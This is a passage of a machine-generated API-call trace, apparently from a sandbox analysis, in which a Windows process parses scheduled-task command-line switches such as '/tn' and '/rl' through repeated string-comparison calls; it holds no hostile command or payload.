_Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|ru|") returned 4 [0028.302] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.302] lstrlenW (lpString="|ru|") returned 4 [0028.302] lstrlenW (lpString="|tn|") returned 4 [0028.302] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0 [0028.302] SetLastError (dwErrCode=0x490) [0028.302] lstrlenW (lpString="rp") returned 2 [0028.302] lstrlenW (lpString="rp") returned 2 [0028.302] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.302] lstrlenW (lpString="tn") returned 2 [0028.302] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.302] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rp|") returned 4 [0028.302] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.302] lstrlenW (lpString="|rp|") returned 4 [0028.302] lstrlenW (lpString="|tn|") returned 4 [0028.302] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0 [0028.302] SetLastError (dwErrCode=0x490) [0028.302] lstrlenW (lpString="sc") returned 2 [0028.302] lstrlenW (lpString="sc") returned 2 [0028.302] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.302] lstrlenW (lpString="tn") returned 2 [0028.302] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.302] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|sc|") returned 4 [0028.302] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.302] lstrlenW (lpString="|sc|") returned 4 [0028.302] lstrlenW (lpString="|tn|") returned 4 [0028.303] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0 [0028.303] SetLastError (dwErrCode=0x490) [0028.303] lstrlenW (lpString="mo") returned 2 [0028.303] lstrlenW (lpString="mo") returned 2 [0028.303] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.303] lstrlenW (lpString="tn") returned 2 [0028.303] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.303] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|mo|") returned 4 [0028.303] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.303] lstrlenW (lpString="|mo|") returned 4 [0028.303] lstrlenW (lpString="|tn|") returned 4 [0028.303] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0 [0028.303] SetLastError (dwErrCode=0x490) [0028.303] lstrlenW (lpString="d") returned 1 [0028.303] lstrlenW (lpString="d") returned 1 [0028.303] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.303] lstrlenW (lpString="tn") returned 2 [0028.303] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.303] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|d|") returned 3 [0028.303] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.303] lstrlenW (lpString="|d|") returned 3 [0028.303] lstrlenW (lpString="|tn|") returned 4 [0028.303] SetLastError (dwErrCode=0x490) [0028.303] lstrlenW (lpString="m") returned 1 [0028.303] lstrlenW (lpString="m") returned 1 [0028.303] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.303] lstrlenW (lpString="tn") returned 2 [0028.303] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.303] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|m|") returned 3 [0028.303] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.303] lstrlenW (lpString="|m|") returned 3 [0028.303] lstrlenW (lpString="|tn|") returned 4 [0028.303] SetLastError (dwErrCode=0x490) [0028.303] lstrlenW (lpString="i") returned 1 [0028.303] lstrlenW (lpString="i") returned 1 [0028.303] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.304] lstrlenW (lpString="tn") returned 2 [0028.304] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.304] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|i|") returned 3 [0028.304] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.304] lstrlenW (lpString="|i|") returned 3 [0028.304] lstrlenW (lpString="|tn|") returned 4 [0028.304] SetLastError (dwErrCode=0x490) [0028.304] lstrlenW (lpString="tn") returned 2 [0028.304] lstrlenW (lpString="tn") returned 2 [0028.304] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.304] lstrlenW (lpString="tn") returned 2 [0028.304] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.304] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.304] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.304] lstrlenW (lpString="|tn|") returned 4 [0028.304] lstrlenW (lpString="|tn|") returned 4 [0028.304] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|" [0028.304] SetLastError (dwErrCode=0x0) [0028.304] SetLastError (dwErrCode=0x0) [0028.304] lstrlenW (lpString="2620738370") returned 10 [0028.304] lstrlenW (lpString="-/") returned 2 [0028.304] StrChrIW (lpStart="-/", wMatch=0x32) returned 0x0 [0028.304] SetLastError (dwErrCode=0x490) [0028.304] SetLastError (dwErrCode=0x490) [0028.304] SetLastError (dwErrCode=0x0) [0028.304] lstrlenW (lpString="2620738370") returned 10 [0028.304] StrChrIW (lpStart="2620738370", wMatch=0x3a) returned 0x0 [0028.304] SetLastError (dwErrCode=0x490) [0028.304] SetLastError (dwErrCode=0x0) [0028.304] lstrlenW (lpString="2620738370") returned 10 [0028.304] SetLastError (dwErrCode=0x0) [0028.304] SetLastError (dwErrCode=0x0) [0028.304] lstrlenW (lpString="/rl") returned 3 [0028.304] lstrlenW (lpString="-/") returned 2 [0028.304] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0028.304] lstrlenW (lpString="create") returned 6 [0028.305] lstrlenW (lpString="create") returned 6 [0028.305] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.305] lstrlenW (lpString="rl") returned 2 [0028.305] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.305] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|create|") returned 8 [0028.305] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.306] lstrlenW (lpString="|create|") returned 8 [0028.306] lstrlenW (lpString="|rl|") returned 4 [0028.306] StrStrIW (lpFirst="|create|", lpSrch="|rl|") returned 0x0 [0028.306] SetLastError (dwErrCode=0x490) [0028.306] lstrlenW (lpString="?") returned 1 [0028.306] lstrlenW (lpString="?") returned 1 [0028.306] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.306] lstrlenW (lpString="rl") returned 2 [0028.306] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.306] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|?|") returned 3 [0028.306] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.306] lstrlenW (lpString="|?|") returned 3 [0028.306] lstrlenW (lpString="|rl|") returned 4 [0028.306] SetLastError (dwErrCode=0x490) [0028.306] lstrlenW (lpString="s") returned 1 [0028.306] lstrlenW (lpString="s") returned 1 [0028.306] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.306] lstrlenW (lpString="rl") returned 2 [0028.306] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.306] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|s|") returned 3 [0028.306] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.306] lstrlenW (lpString="|s|") returned 3 [0028.306] lstrlenW (lpString="|rl|") returned 4 [0028.306] SetLastError (dwErrCode=0x490) [0028.306] lstrlenW (lpString="u") returned 1 [0028.306] lstrlenW (lpString="u") returned 1 [0028.306] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.306] lstrlenW (lpString="rl") returned 2 [0028.306] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.306] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|u|") returned 3 [0028.306] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.306] lstrlenW (lpString="|u|") returned 3 [0028.306] lstrlenW (lpString="|rl|") returned 4 [0028.306] SetLastError (dwErrCode=0x490) [0028.307] lstrlenW (lpString="p") returned 1 [0028.307] lstrlenW (lpString="p") returned 1 [0028.307] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.307] lstrlenW (lpString="rl") returned 2 [0028.307] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.307] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|p|") returned 3 [0028.307] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.307] lstrlenW (lpString="|p|") returned 3 [0028.307] lstrlenW (lpString="|rl|") returned 4 [0028.307] SetLastError (dwErrCode=0x490) [0028.307] lstrlenW (lpString="ru") returned 2 [0028.307] lstrlenW (lpString="ru") returned 2 [0028.307] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.307] lstrlenW (lpString="rl") returned 2 [0028.307] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.307] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|ru|") returned 4 [0028.307] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.307] lstrlenW (lpString="|ru|") returned 4 [0028.307] lstrlenW (lpString="|rl|") returned 4 [0028.307] StrStrIW (lpFirst="|ru|", lpSrch="|rl|") returned 0x0 [0028.307] SetLastError (dwErrCode=0x490) [0028.307] lstrlenW (lpString="rp") returned 2 [0028.307] lstrlenW (lpString="rp") returned 2 [0028.307] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.307] lstrlenW (lpString="rl") returned 2 [0028.307] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.307] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rp|") returned 4 [0028.307] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.307] lstrlenW (lpString="|rp|") returned 4 [0028.307] lstrlenW (lpString="|rl|") returned 4 [0028.307] StrStrIW (lpFirst="|rp|", lpSrch="|rl|") returned 0x0 [0028.307] SetLastError (dwErrCode=0x490) [0028.307] lstrlenW (lpString="sc") returned 2 [0028.307] lstrlenW (lpString="sc") returned 2 [0028.307] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.308] lstrlenW (lpString="rl") returned 2 [0028.308] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.308] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|sc|") returned 4 [0028.308] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.308] lstrlenW (lpString="|sc|") returned 4 [0028.308] lstrlenW (lpString="|rl|") returned 4 [0028.308] StrStrIW (lpFirst="|sc|", lpSrch="|rl|") returned 0x0 [0028.308] SetLastError (dwErrCode=0x490) [0028.308] lstrlenW (lpString="mo") returned 2 [0028.308] lstrlenW (lpString="mo") returned 2 [0028.308] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.308] lstrlenW (lpString="rl") returned 2 [0028.308] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.308] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|mo|") returned 4 [0028.308] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.308] lstrlenW (lpString="|mo|") returned 4 [0028.308] lstrlenW (lpString="|rl|") returned 4 [0028.308] StrStrIW (lpFirst="|mo|", lpSrch="|rl|") returned 0x0 [0028.308] SetLastError (dwErrCode=0x490) [0028.308] lstrlenW (lpString="d") returned 1 [0028.308] lstrlenW (lpString="d") returned 1 [0028.308] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.308] lstrlenW (lpString="rl") returned 2 [0028.308] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.308] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|d|") returned 3 [0028.308] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.308] lstrlenW (lpString="|d|") returned 3 [0028.308] lstrlenW (lpString="|rl|") returned 4 [0028.308] SetLastError (dwErrCode=0x490) [0028.308] lstrlenW (lpString="m") returned 1 [0028.308] lstrlenW (lpString="m") returned 1 [0028.308] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.308] lstrlenW (lpString="rl") returned 2 [0028.308] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.309] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|m|") returned 3 [0028.309] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.309] lstrlenW (lpString="|m|") returned 3 [0028.309] lstrlenW (lpString="|rl|") returned 4 [0028.309] SetLastError (dwErrCode=0x490) [0028.309] lstrlenW (lpString="i") returned 1 [0028.309] lstrlenW (lpString="i") returned 1 [0028.309] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.309] lstrlenW (lpString="rl") returned 2 [0028.309] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.309] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|i|") returned 3 [0028.309] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.309] lstrlenW (lpString="|i|") returned 3 [0028.309] lstrlenW (lpString="|rl|") returned 4 [0028.309] SetLastError (dwErrCode=0x490) [0028.309] lstrlenW (lpString="tn") returned 2 [0028.309] lstrlenW (lpString="tn") returned 2 [0028.309] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.309] lstrlenW (lpString="rl") returned 2 [0028.309] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.309] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.309] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.309] lstrlenW (lpString="|tn|") returned 4 [0028.309] lstrlenW (lpString="|rl|") returned 4 [0028.309] StrStrIW (lpFirst="|tn|", lpSrch="|rl|") returned 0x0 [0028.309] SetLastError (dwErrCode=0x490) [0028.309] lstrlenW (lpString="tr") returned 2 [0028.309] lstrlenW (lpString="tr") returned 2 [0028.309] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.309] lstrlenW (lpString="rl") returned 2 [0028.309] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.309] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.309] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.309] lstrlenW (lpString="|tr|") returned 4 [0028.309] lstrlenW (lpString="|rl|") returned 4 [0028.310] StrStrIW (lpFirst="|tr|", lpSrch="|rl|") returned 0x0 [0028.310] SetLastError (dwErrCode=0x490) [0028.310] lstrlenW (lpString="st") returned 2 [0028.310] lstrlenW (lpString="st") returned 2 [0028.310] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.310] lstrlenW (lpString="rl") returned 2 [0028.310] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.310] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|st|") returned 4 [0028.310] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.310] lstrlenW (lpString="|st|") returned 4 [0028.310] lstrlenW (lpString="|rl|") returned 4 [0028.310] StrStrIW (lpFirst="|st|", lpSrch="|rl|") returned 0x0 [0028.310] SetLastError (dwErrCode=0x490) [0028.310] lstrlenW (lpString="sd") returned 2 [0028.310] lstrlenW (lpString="sd") returned 2 [0028.310] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.310] lstrlenW (lpString="rl") returned 2 [0028.310] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.310] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|sd|") returned 4 [0028.310] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.310] lstrlenW (lpString="|sd|") returned 4 [0028.310] lstrlenW (lpString="|rl|") returned 4 [0028.310] StrStrIW (lpFirst="|sd|", lpSrch="|rl|") returned 0x0 [0028.310] SetLastError (dwErrCode=0x490) [0028.310] lstrlenW (lpString="ed") returned 2 [0028.310] lstrlenW (lpString="ed") returned 2 [0028.310] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.310] lstrlenW (lpString="rl") returned 2 [0028.310] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.310] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|ed|") returned 4 [0028.310] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.310] lstrlenW (lpString="|ed|") returned 4 [0028.310] lstrlenW (lpString="|rl|") returned 4 [0028.310] StrStrIW (lpFirst="|ed|", lpSrch="|rl|") returned 0x0 [0028.311] SetLastError (dwErrCode=0x490) [0028.311] lstrlenW (lpString="it") returned 2 [0028.311] lstrlenW (lpString="it") returned 2 [0028.311] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.311] lstrlenW (lpString="rl") returned 2 [0028.311] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.311] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|it|") returned 4 [0028.311] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.311] lstrlenW (lpString="|it|") returned 4 [0028.311] lstrlenW (lpString="|rl|") returned 4 [0028.311] StrStrIW (lpFirst="|it|", lpSrch="|rl|") returned 0x0 [0028.311] SetLastError (dwErrCode=0x490) [0028.311] lstrlenW (lpString="et") returned 2 [0028.311] lstrlenW (lpString="et") returned 2 [0028.311] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.311] lstrlenW (lpString="rl") returned 2 [0028.311] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.311] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|et|") returned 4 [0028.311] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.311] lstrlenW (lpString="|et|") returned 4 [0028.311] lstrlenW (lpString="|rl|") returned 4 [0028.311] StrStrIW (lpFirst="|et|", lpSrch="|rl|") returned 0x0 [0028.311] SetLastError (dwErrCode=0x490) [0028.311] lstrlenW (lpString="k") returned 1 [0028.311] lstrlenW (lpString="k") returned 1 [0028.311] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.311] lstrlenW (lpString="rl") returned 2 [0028.311] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.311] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|k|") returned 3 [0028.311] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.311] lstrlenW (lpString="|k|") returned 3 [0028.311] lstrlenW (lpString="|rl|") returned 4 [0028.311] SetLastError (dwErrCode=0x490) [0028.311] lstrlenW (lpString="du") returned 2 [0028.311] lstrlenW (lpString="du") returned 2 [0028.312] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.312] lstrlenW (lpString="rl") returned 2 [0028.312] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.312] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|du|") returned 4 [0028.312] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.312] lstrlenW (lpString="|du|") returned 4 [0028.312] lstrlenW (lpString="|rl|") returned 4 [0028.312] StrStrIW (lpFirst="|du|", lpSrch="|rl|") returned 0x0 [0028.312] SetLastError (dwErrCode=0x490) [0028.312] lstrlenW (lpString="ri") returned 2 [0028.312] lstrlenW (lpString="ri") returned 2 [0028.312] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.312] lstrlenW (lpString="rl") returned 2 [0028.312] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.312] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|ri|") returned 4 [0028.312] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.312] lstrlenW (lpString="|ri|") returned 4 [0028.312] lstrlenW (lpString="|rl|") returned 4 [0028.312] StrStrIW (lpFirst="|ri|", lpSrch="|rl|") returned 0x0 [0028.312] SetLastError (dwErrCode=0x490) [0028.312] lstrlenW (lpString="z") returned 1 [0028.312] lstrlenW (lpString="z") returned 1 [0028.312] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.312] lstrlenW (lpString="rl") returned 2 [0028.312] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.312] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|z|") returned 3 [0028.312] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.312] lstrlenW (lpString="|z|") returned 3 [0028.312] lstrlenW (lpString="|rl|") returned 4 [0028.312] SetLastError (dwErrCode=0x490) [0028.312] lstrlenW (lpString="f") returned 1 [0028.312] lstrlenW (lpString="f") returned 1 [0028.312] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.312] lstrlenW (lpString="rl") returned 2 [0028.313] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.313] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|f|") returned 3 [0028.313] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.313] lstrlenW (lpString="|f|") returned 3 [0028.313] lstrlenW (lpString="|rl|") returned 4 [0028.313] SetLastError (dwErrCode=0x490) [0028.313] lstrlenW (lpString="v1") returned 2 [0028.313] lstrlenW (lpString="v1") returned 2 [0028.313] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.313] lstrlenW (lpString="rl") returned 2 [0028.313] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.313] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|v1|") returned 4 [0028.313] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.313] lstrlenW (lpString="|v1|") returned 4 [0028.313] lstrlenW (lpString="|rl|") returned 4 [0028.313] StrStrIW (lpFirst="|v1|", lpSrch="|rl|") returned 0x0 [0028.313] SetLastError (dwErrCode=0x490) [0028.313] lstrlenW (lpString="xml") returned 3 [0028.313] lstrlenW (lpString="xml") returned 3 [0028.313] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.313] lstrlenW (lpString="rl") returned 2 [0028.313] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.313] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x16c894 | out: 